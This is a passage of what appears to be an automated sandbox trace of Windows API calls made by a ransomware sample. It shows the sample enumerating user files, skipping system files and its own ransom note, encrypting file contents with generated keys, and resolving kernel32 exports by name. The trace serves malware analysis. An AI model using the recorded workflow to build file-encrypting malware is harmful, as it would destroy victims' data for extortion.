HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0076.934] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\jkbimi8.tmp" [0076.934] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.935] CloseHandle (hObject=0x0) returned 0 [0076.935] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.935] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.935] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0076.935] CloseHandle (hObject=0x448) returned 1 [0076.935] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2\\", cAlternateFileName="LOGTRA~1")) returned 0 [0076.935] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0076.935] CloseHandle (hObject=0x440) returned 1 [0076.937] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2e41510, ftCreationTime.dwHighDateTime=0x1d4c749, ftLastAccessTime.dwLowDateTime=0xd4dcb8a0, ftLastAccessTime.dwHighDateTime=0x1d4caea, ftLastWriteTime.dwLowDateTime=0xd4dcb8a0, ftLastWriteTime.dwHighDateTime=0x1d4caea, nFileSizeHigh=0x0, nFileSizeLow=0x11811, dwReserved0=0x0, dwReserved1=0x0, cFileName="ajTbqxKluAP5yMsiQz.mkv", cAlternateFileName="AJTBQX~1.MKV")) returned 1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="DECRYPT-FILES.txt") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="autorun.inf") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="boot.ini") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="desktop.ini") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="ntuser.dat") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="iconcache.db") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="bootsect.bak") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="ntuser.dat.log") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="thumbs.db") returned -1 [0076.937] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv", lpString2="Bootfont.bin") returned -1 [0076.937] lstrlenW (lpString="ajTbqxKluAP5yMsiQz.mkv") returned 22 [0076.937] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0076.937] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0076.937] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0076.937] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0076.937] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.937] lstrlenW (lpString="ajTbqxKluAP5yMsiQz.mkv") returned 22 [0076.937] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.937] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ajTbqxKluAP5yMsiQz.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv" [0076.937] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ajtbqxkluap5ymsiqz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.938] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=71697) returned 1 [0076.938] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.938] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.938] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.938] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.938] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.939] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.939] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.940] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.940] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.941] CloseHandle (hObject=0x444) returned 1 [0076.941] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.941] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.942] CloseHandle (hObject=0x0) returned 0 [0076.942] CloseHandle (hObject=0x440) returned 1 [0076.943] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.943] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.943] GetTickCount () returned 0x114bbf0 [0076.944] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.944] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.944] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.944] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.944] lstrlenA (lpString="kernel32.dll") returned 12 [0076.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.945] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.945] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.945] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.945] lstrlenA (lpString="ADDATOMA") returned 8 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.945] lstrlenA (lpString="ADDATOMW") returned 8 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.945] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.945] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.945] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.945] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.945] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.945] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.945] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.945] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.945] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.945] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.945] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.945] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.945] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.945] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.946] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.946] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.946] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.946] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.946] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.946] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.946] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.946] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.946] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.946] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.946] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.946] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.946] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.946] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.946] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.946] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.946] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.946] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.946] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.946] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.947] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.947] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.947] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.947] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.947] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.947] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.947] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.947] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.947] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.947] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.947] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.947] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.947] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.947] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.947] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.947] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.947] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.947] lstrlenA (lpString="BEEP") returned 4 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.947] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.947] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.948] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.948] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.948] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.948] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.948] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.948] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.948] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.948] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.948] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.948] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.948] lstrlenA (lpString="CANCELIO") returned 8 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.948] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.948] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.948] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.948] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.948] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.948] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.948] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.948] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.948] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.949] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.949] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.949] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.949] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.949] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") 